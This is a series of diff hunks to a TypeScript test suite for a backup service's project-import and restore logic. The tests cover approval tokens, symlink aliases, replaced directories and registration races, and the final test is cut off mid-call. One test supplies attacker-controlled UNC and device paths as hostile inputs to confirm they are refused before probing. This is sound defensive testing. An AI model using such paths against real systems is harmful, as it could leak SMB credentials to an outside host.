 import { BackupNonFastForwardError, backupCachePath, isBackupCacheName } from "./gitRepo";
 import { BackupRemoteUnreachableError } from "./credentials";
 import { BackupCommandApprovalRequiredError } from "./payload";
@@ -533,7 +534,11 @@ describe("BackupService", () => {
         },
         restore: (options) => {
           recordManagedPath(options);
-          return Promise.resolve({ changedFiles: [], localOnlyFiles: [], projectBundleSkipped: false });
+          return Promise.resolve({
+            changedFiles: [],
+            localOnlyFiles: [],
+            projectBundleSkipped: false,
+          });
         },
       }),
     });
@@ -1012,5 +1017,215 @@ describe("BackupService", () => {
         lastRestoredCommit: undefined,
       },
     });
+  });
+});
+
+describe("BackupService project imports", () => {
+  let tempDir: string;
+
+  beforeEach(async () => {
+    tempDir = await fs.mkdtemp(path.join(os.tmpdir(), "mux-backup-imports-"));
+  });
+
+  afterEach(async () => {
+    await fs.rm(tempDir, { recursive: true, force: true });
+  });
+
+  function candidate(overrides: Partial<BackupProjectImport> = {}): BackupProjectImport {
+    return {
+      sourcePath: "/home/dev/src/alpha",
+      name: "alpha",
+      memoryFileCount: 1,
+      token: "candidate-token",
+      ...overrides,
+    };
+  }
+
+  test("persists includeProjects and passes it to the payload store", async () => {
+    const seen: boolean[] = [];
+    const config = new TestBackupConfig(tempDir);
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        exportTo: (options) => {
+          seen.push(options.includeProjects);
+          return Promise.resolve({ redactions: [], secretFiles: [], secretApproval: "" });
+        },
+      }),
+    });
+
+    const saved = await service.saveSettings({ ...SETTINGS, includeProjects: true });
+    expect(saved.success).toBe(true);
+    expect(service.getSettings()?.includeProjects).toBe(true);
+
+    expect((await service.push({ ...SETTINGS, includeProjects: true })).success).toBe(true);
+    expect((await service.push(SETTINGS)).success).toBe(true);
+    expect(seen).toEqual([true, false]);
+  });
+
+  test("refuses an unknown import token with fresh candidates before the snapshot", async () => {
+    const fresh = candidate();
+    let snapshots = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () => Promise.resolve({ hasProjectBundle: true, projectImports: [fresh] }),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "stale-token", targetPath: tempDir }] }
+    );
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.code).toBe("PROJECT_IMPORT_APPROVAL_REQUIRED");
+      expect(result.error.projectImports).toEqual([fresh]);
+      expect(result.error.snapshotPath).toBeUndefined();
+    }
+    expect(snapshots).toBe(0);
+  });
+
+  test("refuses an unusable import target before the snapshot", async () => {
+    let snapshots = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({ hasProjectBundle: true, projectImports: [candidate()] }),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+
+    for (const targetPath of [path.join(tempDir, "missing"), "relative/path"]) {
+      const result = await service.restore(
+        { ...SETTINGS, includeProjects: true },
+        { projectImports: [{ token: "candidate-token", targetPath }] }
+      );
+      expect(result.success).toBe(false);
+      if (!result.success) {
+        expect(result.error.code).toBe("IO_ERROR");
+        expect(result.error.snapshotPath).toBeUndefined();
+      }
+    }
+    expect(snapshots).toBe(0);
+  });
+
+  test("registers a project before writing its memory and isolates per-candidate failures", async () => {
+    const goodDir = path.join(tempDir, "good");
+    const badDir = path.join(tempDir, "bad");
+    await fs.mkdir(goodDir);
+    await fs.mkdir(badDir);
+    const candidates = [
+      candidate({ sourcePath: "/src/good", name: "good", token: "good-token" }),
+      candidate({ sourcePath: "/src/bad", name: "bad", token: "bad-token" }),
+    ];
+    const events: string[] = [];
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({ hasProjectBundle: true, projectImports: candidates }),
+        importProjectMemory: (options) => {
+          events.push(`import:${options.targetPath}`);
+          return Promise.resolve({
+            writtenFiles: ["memory/project/good-abc/notes.md"],
+            skippedFiles: [],
+          });
+        },
+      }),
+    });
+    service.setProjectService({
+      create: (projectPath) => {
+        events.push(`create:${projectPath}`);
+        return Promise.resolve(
+          projectPath === goodDir ? Ok({ normalizedPath: projectPath }) : Err("registration failed")
+        );
+      },
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      {
+        projectImports: [
+          { token: "good-token", targetPath: goodDir },
+          { token: "bad-token", targetPath: badDir },
+        ],
+      }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults).toEqual([
+        {
+          sourcePath: "/src/good",
+          targetPath: goodDir,
+          name: "good",
+          status: "imported",
+          writtenFiles: ["memory/project/good-abc/notes.md"],
+          skippedFiles: [],
+        },
+        {
+          sourcePath: "/src/bad",
+          targetPath: badDir,
+          name: "bad",
+          status: "failed",
+          message: "registration failed",
+          writtenFiles: [],
+          skippedFiles: [],
+        },
+      ]);
+    }
+    // Registration always completes before the memory write for its candidate; the failed
+    // registration never reaches the memory write.
+    expect(events).toEqual([`create:${goodDir}`, `import:${goodDir}`, `create:${badDir}`]);
+  });
+
+  test("tolerates a project already registered at the target path", async () => {
+    const target = path.join(tempDir, "already");
+    await fs.mkdir(target);
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({ hasProjectBundle: true, projectImports: [candidate()] }),
+      }),
+    });
+    service.setProjectService({
+      create: () => Promise.resolve(Err("Project already exists")),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]?.status).toBe("imported");
+    }
+  });
+
+  test("asks the snapshot to cover project memory only when the payload carries a bundle", async () => {
+    const flags: boolean[] = [];
+    const payload = (hasProjectBundle: boolean) =>
+      createPayload({
+        validateRestore: () => Promise.resolve({ hasProjectBundle, projectImports: [] }),
+        writeSafetySnapshot: (_snapshotRoot, options) => {
+          flags.push(options.includeProjectMemory);
+          return Promise.resolve();
+        },
+      });
+
+    const withBundle = createService(tempDir, { payload: payload(true) });
+    expect((await withBundle.restore({ ...SETTINGS, includeProjects: true })).success).toBe(true);
+    const withoutToggle = createService(tempDir, { payload: payload(false) });
+    expect((await withoutToggle.restore(SETTINGS)).success).toBe(true);
+
+    expect(flags).toEqual([true, false]);
   });
 });

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1634,7 +1634,7 @@ describe("BackupService project imports", () => {
     expect(registrations).toBe(1);
   });
 
-  test("imports into a project registered through another alias after planning", async () => {
+  test("refuses an import whose target was registered under another alias after planning", async () => {
     const realParent = path.join(tempDir, "real");
     await fs.mkdir(path.join(realParent, "repo"), { recursive: true });
     const aliasA = path.join(tempDir, "alias-a");
@@ -1685,7 +1685,18 @@ describe("BackupService project imports", () => {
 
     expect(result.success).toBe(true);
     expect(registrations).toBe(0);
-    expect(importedTo).toEqual([registeredAlias]);
+    // Nor may it write into the alias's memory scope: the preflight checked the target's,
+    // so the candidate fails without a write and is re-offered for a checked retry.
+    expect(importedTo).toEqual([]);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: expect.stringContaining(registeredAlias) as string,
+      });
+      expect(result.data.unapprovedProjectImports.map((item) => item.token)).toEqual([
+        "candidate-token",
+      ]);
+    }
   });
 
   test("refuses an import into a project that a matched entry restores in the same run", async () => {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -128,8 +128,12 @@ function matchedIdentity(projectPath: string): BackupMatchedProject {
 }
 
 /** A registrar mock around the given create(). */
-function registrar(create: BackupProjectRegistrar["create"]): BackupProjectRegistrar {
-  return { create };
+type RegistrarCreate = Parameters<
+  Parameters<BackupProjectRegistrar["withRegistrationLock"]>[0]
+>[0]["create"];
+
+function registrar(create: RegistrarCreate): BackupProjectRegistrar {
+  return { withRegistrationLock: (fn) => fn({ create }) };
 }
 
 function createService(

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1592,6 +1592,49 @@ describe("BackupService project imports", () => {
     expect(events).toEqual(["import:remote-commit"]);
   });
 
+  test("announces restored memory even when recording the commit fails afterwards", async () => {
+    const notified: string[] = [];
+    const config = new TestBackupConfig(tempDir);
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [],
+            matchedProjectPaths: ["/home/dev/src/alpha"],
+          }),
+        restore: () =>
+          Promise.resolve({
+            changedFiles: ["memory/project/alpha-abc/notes.md"],
+            localOnlyFiles: [],
+            projectBundleSkipped: false,
+            restoredProjectMemory: [
+              { projectPath: "/home/dev/src/alpha", files: ["memory/project/alpha-abc/notes.md"] },
+            ],
+          }),
+      }),
+    });
+    service.setMemoryNotifier({
+      notifyExternalProjectChange: (projectPath) => {
+        notified.push(projectPath);
+      },
+    });
+    expect((await service.saveSettings({ ...SETTINGS, includeProjects: true })).success).toBe(true);
+    // config.json stops accepting writes after the restore has already landed on disk.
+    spyOn(config, "editConfig").mockImplementation(() => Promise.resolve());
+
+    const result = await service.restore({ ...SETTINGS, includeProjects: true });
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.code).toBe("IO_ERROR");
+      expect(result.error.snapshotPath).toBeDefined();
+    }
+    // Restored memory was on disk before the persist step failed.
+    expect(notified).toEqual(["/home/dev/src/alpha"]);
+  });
+
   test("announces memory a failed matched restore already wrote", async () => {
     const notified: string[] = [];
     const service = createService(tempDir, {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1906,6 +1906,63 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("refuses an import whose target directory was deleted and recreated since approval", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const importedTo: string[] = [];
+    let registrations = 0;
+    let approvedInode: bigint | null = null;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        // Deleted and recreated, not moved: the freed inode number is what a filesystem hands
+        // out again, so the new directory can report the identity recorded at approval.
+        writeSafetySnapshot: async () => {
+          approvedInode = (await fs.stat(target, { bigint: true })).ino;
+          await fs.rm(target, { recursive: true });
+          await fs.mkdir(target);
+        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    expect(registrations).toBe(0);
+    expect(importedTo).toEqual([]);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: expect.stringContaining("replaced") as string,
+      });
+    }
+    // The plan held the approved directory open, so its inode stayed allocated and the
+    // replacement could not be given it — that, not luck in allocation, is what the check
+    // relies on. Released once the restore returned.
+    expect((await fs.stat(target, { bigint: true })).ino).not.toBe(approvedInode);
+  });
+
   test("does not import into a target replaced while it was being registered", async () => {
     const target = path.join(tempDir, "target");
     await fs.mkdir(target);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1581,6 +1581,49 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("re-registers a target whose planned registration vanished before the import", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(target, { workspaces: [] });
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        // Another window unregisters the project while the snapshot is being written —
+        // after planning resolved the target as already registered.
+        writeSafetySnapshot: () => {
+          config.state.projects.delete(target);
+          return Promise.resolve();
+        },
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]?.status).toBe("imported");
+    }
+    // Memory must not be written into an unregistered scope on a stale identity.
+    expect(registrations).toBe(1);
+  });
+
   test("refuses network and device import targets before probing them", async () => {
     let probes = 0;
     const realLstat = fs.lstat.bind(fs);

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1247,6 +1247,7 @@ describe("BackupService project imports", () => {
           status: "imported",
           writtenFiles: ["memory/project/good-abc/notes.md"],
           skippedFiles: [],
+          registered: true,
         },
         {
           sourcePath: "/src/bad",
@@ -1256,6 +1257,7 @@ describe("BackupService project imports", () => {
           message: "registration failed",
           writtenFiles: [],
           skippedFiles: [],
+          registered: false,
         },
       ]);
     }

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1581,6 +1581,45 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("refuses network and device import targets before probing them", async () => {
+    let probes = 0;
+    const realLstat = fs.lstat.bind(fs);
+    const lstat = spyOn(fs, "lstat").mockImplementation(((target, options) => {
+      probes += 1;
+      return realLstat(target, options);
+    }) as typeof fs.lstat);
+    try {
+      const service = createService(tempDir, {
+        payload: createPayload({
+          validateRestore: () =>
+            Promise.resolve({
+              hasProjectBundle: true,
+              projectImports: [candidate()],
+              matchedProjectPaths: [],
+            }),
+        }),
+      });
+      for (const targetPath of [
+        "\\\\attacker\\share\\repo",
+        "//attacker/share/repo",
+        "\\\\?\\C:\\x",
+      ]) {
+        const result = await service.restore(
+          { ...SETTINGS, includeProjects: true },
+          { projectImports: [{ token: "candidate-token", targetPath }] }
+        );
+        expect(result.success).toBe(false);
+        if (!result.success) {
+          expect(result.error.message).toContain("network or device path");
+        }
+      }
+      // A stat of a UNC path would already start SMB authentication.
+      expect(probes).toBe(0);
+    } finally {
+      lstat.mockRestore();
+    }
+  });
+
   test("refuses two imports whose targets are aliases of one directory", async () => {
     const realParent = path.join(tempDir, "real");
     const target = path.join(realParent, "proj");

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -109,9 +109,11 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
 }
 /** A payload store slice whose single prepared importer runs the given import implementation. */
 function importsWith(
-  importProjectMemory: BackupProjectImporter["importProjectMemory"]
+  importProjectMemory: BackupProjectImporter["importProjectMemory"],
+  assertProjectMemoryAllowed: BackupProjectImporter["assertProjectMemoryAllowed"] = () =>
+    Promise.resolve()
 ): BackupProjectImporter {
-  return { importProjectMemory };
+  return { assertProjectMemoryAllowed, importProjectMemory };
 }
 
 function createService(
@@ -1329,6 +1331,85 @@ describe("BackupService project imports", () => {
       });
     }
     expect(importedTo).toEqual([registered]);
+  });
+
+  test("reports candidates a restore left unimported for lack of approval", async () => {
+    const target = path.join(tempDir, "approved");
+    await fs.mkdir(target);
+    const approved = candidate();
+    const skipped = candidate({ name: "beta", token: "beta-token", sourcePath: "/src/beta" });
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [approved, skipped],
+            matchedProjectPaths: [],
+          }),
+      }),
+    });
+    service.setProjectService({
+      create: (projectPath) => Promise.resolve(Ok({ normalizedPath: projectPath })),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.projectImportResults.map((item) => item.status)).toEqual(["imported"]);
+      // A "completed" restore never silently omits backed-up projects.
+      expect(result.data.unapprovedProjectImports).toEqual([skipped]);
+    }
+  });
+
+  test("refuses an approved import whose memory cannot land before taking a snapshot", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    let snapshots = 0;
+    let registrations = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(
+              () => Promise.resolve({ writtenFiles: [], skippedFiles: [] }),
+              () => Promise.reject(new Error("larger than the memory file limit"))
+            )
+          ),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+    service.setProjectService({
+      create: (projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      },
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("memory file limit");
+    }
+    // Refused while nothing had changed: no snapshot, no registered project left behind.
+    expect(snapshots).toBe(0);
+    expect(registrations).toBe(0);
   });
 
   test("refuses two imports whose targets are aliases of one directory", async () => {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -13,6 +13,7 @@ import {
 } from "./payload";
 import {
   BackupService,
+  type BackupProjectImporter,
   BackupServiceError,
   type BackupGitRepo,
   type BackupPayloadStore,
@@ -101,10 +102,18 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
         projectBundleSkipped: false,
         restoredProjectMemory: [],
       }),
-    importProjectMemory: () => Promise.resolve({ writtenFiles: [], skippedFiles: [] }),
+    prepareProjectImports: () =>
+      Promise.resolve(importsWith(() => Promise.resolve({ writtenFiles: [], skippedFiles: [] }))),
     ...overrides,
   };
 }
+/** A payload store slice whose single prepared importer runs the given import implementation. */
+function importsWith(
+  importProjectMemory: BackupProjectImporter["importProjectMemory"]
+): BackupProjectImporter {
+  return { importProjectMemory };
+}
+
 function createService(
   rootDir: string,
   overrides: {
@@ -1173,13 +1182,16 @@ describe("BackupService project imports", () => {
             projectImports: candidates,
             matchedProjectPaths: [],
           }),
-        importProjectMemory: (options) => {
-          events.push(`import:${options.targetPath}`);
-          return Promise.resolve({
-            writtenFiles: ["memory/project/good-abc/notes.md"],
-            skippedFiles: [],
-          });
-        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              events.push(`import:${options.targetPath}`);
+              return Promise.resolve({
+                writtenFiles: ["memory/project/good-abc/notes.md"],
+                skippedFiles: [],
+              });
+            })
+          ),
       }),
     });
     service.setProjectService({
@@ -1243,10 +1255,13 @@ describe("BackupService project imports", () => {
             projectImports: [candidate()],
             matchedProjectPaths: [],
           }),
-        importProjectMemory: (options) => {
-          importedTo.push(options.targetPath);
-          return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
-        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
       }),
     });
     service.setProjectService({
@@ -1285,10 +1300,13 @@ describe("BackupService project imports", () => {
             projectImports: [candidate()],
             matchedProjectPaths: [],
           }),
-        importProjectMemory: (options) => {
-          importedTo.push(options.targetPath);
-          return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
-        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
       }),
     });
     // ProjectService resolves the alias to the registered project and reports a duplicate.
@@ -1313,6 +1331,47 @@ describe("BackupService project imports", () => {
     expect(importedTo).toEqual([registered]);
   });
 
+  test("refuses two imports whose targets are aliases of one directory", async () => {
+    const realParent = path.join(tempDir, "real");
+    const target = path.join(realParent, "proj");
+    await fs.mkdir(target, { recursive: true });
+    const aliasParent = path.join(tempDir, "alias");
+    await fs.symlink(realParent, aliasParent, "dir");
+    const aliasTarget = path.join(aliasParent, "proj");
+    let snapshots = 0;
+    const service = createService(tempDir, {
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate(), candidate({ name: "beta", token: "beta-token" })],
+            matchedProjectPaths: [],
+          }),
+        writeSafetySnapshot: () => {
+          snapshots += 1;
+          return Promise.resolve();
+        },
+      }),
+    });
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      {
+        projectImports: [
+          { token: "candidate-token", targetPath: target },
+          { token: "beta-token", targetPath: aliasTarget },
+        ],
+      }
+    );
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("another import already targets");
+    }
+    // Refused during planning: two backed-up projects would otherwise merge into one.
+    expect(snapshots).toBe(0);
+  });
+
   test("fails an import whose duplicate registration cannot be resolved to a path", async () => {
     const target = path.join(tempDir, "unresolved");
     await fs.mkdir(target);
@@ -1325,10 +1384,13 @@ describe("BackupService project imports", () => {
             projectImports: [candidate()],
             matchedProjectPaths: [],
           }),
-        importProjectMemory: () => {
-          imports += 1;
-          return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
-        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => {
+              imports += 1;
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
       }),
     });
     // Duplicate reported, but nothing in config matches the target or its real path.
@@ -1361,12 +1423,16 @@ describe("BackupService project imports", () => {
             projectImports: [candidate()],
             matchedProjectPaths: [],
           }),
-        importProjectMemory: () =>
-          Promise.reject(
-            new ProjectMemoryWriteError("disk full", {
-              written: ["memory/project/alpha-abc/first.md"],
-              skipped: ["memory/project/alpha-abc/kept.md"],
-            })
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() =>
+              Promise.reject(
+                new ProjectMemoryWriteError("disk full", {
+                  written: ["memory/project/alpha-abc/first.md"],
+                  skipped: ["memory/project/alpha-abc/kept.md"],
+                })
+              )
+            )
           ),
       }),
     });
@@ -1451,11 +1517,15 @@ describe("BackupService project imports", () => {
               },
             ],
           }),
-        importProjectMemory: () =>
-          Promise.resolve({
-            writtenFiles: ["memory/project/imported-def/todo.md"],
-            skippedFiles: [],
-          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() =>
+              Promise.resolve({
+                writtenFiles: ["memory/project/imported-def/todo.md"],
+                skippedFiles: [],
+              })
+            )
+          ),
       }),
     });
     service.setProjectService({
@@ -1513,6 +1583,43 @@ describe("BackupService project imports", () => {
     }
     // Disk changed for alpha even though the restore failed on beta.
     expect(notified).toEqual([{ projectPath: "/home/dev/src/alpha", relPaths: ["notes.md"] }]);
+  });
+
+  test("keeps the restore half of a preview when the export half fails", async () => {
+    const fresh = candidate();
+    let pushChangeLookups = 0;
+    const service = createService(tempDir, {
+      gitRepo: createGitRepo({
+        getPushChanges: () => {
+          pushChangeLookups += 1;
+          return Promise.resolve([]);
+        },
+      }),
+      payload: createPayload({
+        previewRestore: () =>
+          Promise.resolve({
+            changes: [{ status: "M", path: "AGENTS.md" }],
+            localOnlyFiles: [],
+            commandApprovals: [],
+            projectImports: [fresh],
+            projectBundleSkipped: false,
+          }),
+        exportTo: () => Promise.reject(new Error("Backup has more than 256 projects")),
+      }),
+    });
+
+    const result = await service.preview({ ...SETTINGS, includeProjects: true });
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      // The import tokens a cross-machine restore needs survive a local export problem.
+      expect(result.data.projectImports).toEqual([fresh]);
+      expect(result.data.restoreChanges).toEqual([{ status: "M", path: "AGENTS.md" }]);
+      expect(result.data.pushError).toContain("more than 256 projects");
+      expect(result.data.pushChanges).toEqual([]);
+    }
+    // No export landed in the checkout, so there is nothing to diff.
+    expect(pushChangeLookups).toBe(0);
   });
 
   test("keeps a concurrently saved project-backup toggle when recording a commit", async () => {

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -2155,6 +2155,74 @@ describe("BackupService project imports", () => {
     }
   }, 20_000);
 
+  test("does not register a target while registered paths it could not check remain", async () => {
+    const realParent = path.join(tempDir, "real");
+    await fs.mkdir(path.join(realParent, "repo"), { recursive: true });
+    const aliasA = path.join(tempDir, "alias-a");
+    const aliasB = path.join(tempDir, "alias-b");
+    await fs.symlink(realParent, aliasA, "dir");
+    await fs.symlink(realParent, aliasB, "dir");
+    const registeredAlias = path.join(aliasA, "repo");
+    const unavailable = [path.join(tempDir, "mount-1"), path.join(tempDir, "mount-2")];
+    const config = new TestBackupConfig(tempDir);
+    // Two projects on mounts that never answer are probed first; the pass stops probing after
+    // them, so the alias behind them is never checked.
+    for (const mount of unavailable) config.state.projects.set(mount, { workspaces: [] });
+    config.state.projects.set(registeredAlias, { workspaces: [] });
+    let registrations = 0;
+    let imports = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith(() => {
+              imports += 1;
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+    const realRealpath = fs.realpath.bind(fs);
+    const realpath = spyOn(fs, "realpath").mockImplementation(((target: string) =>
+      unavailable.includes(target)
+        ? new Promise<string>(() => undefined)
+        : realRealpath(target)) as unknown as typeof fs.realpath);
+    try {
+      const result = await service.restore(
+        { ...SETTINGS, includeProjects: true },
+        { projectImports: [{ token: "candidate-token", targetPath: path.join(aliasB, "repo") }] }
+      );
+      expect(result.success).toBe(true);
+      // An incomplete lookup is not proof that no alias exists: registering would have given
+      // the directory a second project identity. Refused, not registered, still on offer.
+      // Three unresolved: the two that stalled and the alias the pass then did not probe.
+      expect(registrations).toBe(0);
+      expect(imports).toBe(0);
+      if (result.success) {
+        expect(result.data.projectImportResults[0]).toMatchObject({
+          status: "failed",
+          message: expect.stringContaining("could not be checked against 3 registered") as string,
+        });
+        expect(result.data.unapprovedProjectImports).toHaveLength(1);
+      }
+    } finally {
+      realpath.mockRestore();
+    }
+  }, 20_000);
+
   test("refuses an import into a directory at another backed-up project's recorded path", async () => {
     // Local directories at two other entries' recorded paths: one still on offer, one matched.
     const otherCandidatePath = path.join(tempDir, "beta");

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -1703,6 +1703,105 @@ describe("BackupService project imports", () => {
     }
   });
 
+  test("never resolves an import target to a system project entry", async () => {
+    // A system-kind entry registered at a real directory: MemoryService keeps no project
+    // memory for it, so an import resolving to that identity would land notes nowhere.
+    const target = path.join(tempDir, "system-checkout");
+    await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    config.state.projects.set(target, { workspaces: [], projectKind: "system" });
+    const importedTo: string[] = [];
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    // Not found in the identity lookup, so registration is attempted — and ProjectService
+    // refuses the path as already taken; the candidate fails instead of writing.
+    service.setProjectService(registrar(() => Promise.resolve(Err("Project already exists"))));
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
+      { projectImports: [{ token: "candidate-token", targetPath: target }] }
+    );
+
+    expect(result.success).toBe(true);
+    expect(importedTo).toEqual([]);
+    if (result.success) {
+      expect(result.data.projectImportResults[0]).toMatchObject({
+        status: "failed",
+        message: expect.stringContaining("different path") as string,
+      });
+    }
+  });
+
+  test("refuses an import whose target directory was replaced since approval", async () => {
+    const target = path.join(tempDir, "target");
+    await fs.mkdir(target);
+    const config = new TestBackupConfig(tempDir);
+    const importedTo: string[] = [];
+    let registrations = 0;
+    const service = createService(tempDir, {
+      config,
+      payload: createPayload({
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjects: [],
+          }),
+        // The approved checkout is moved away and another directory created at its path
+        // while the snapshot is being written.
+        writeSafetySnapshot: async () => {
+          await fs.rename(target, path.join(tempDir, "target-moved"));
+          await fs.mkdir(target);
+        },
+        prepareProjectImports: () =>
+          Promise.resolve(
+            importsWith((options) => {
+              importedTo.push(options.targetPath);
+              return Promise.resolve({ writtenFiles: [], skippedFiles: [] });
+            })
+          ),
+      }),
+    });
+    service.setProjectService(
+      registrar((projectPath) => {
+        registrations += 1;
+        return Promise.resolve(Ok({ normalizedPath: projectPath }));
+      })
+    );
+
+    const result = await service.restore(
+      { ...SETTINGS, includeProjects: true },
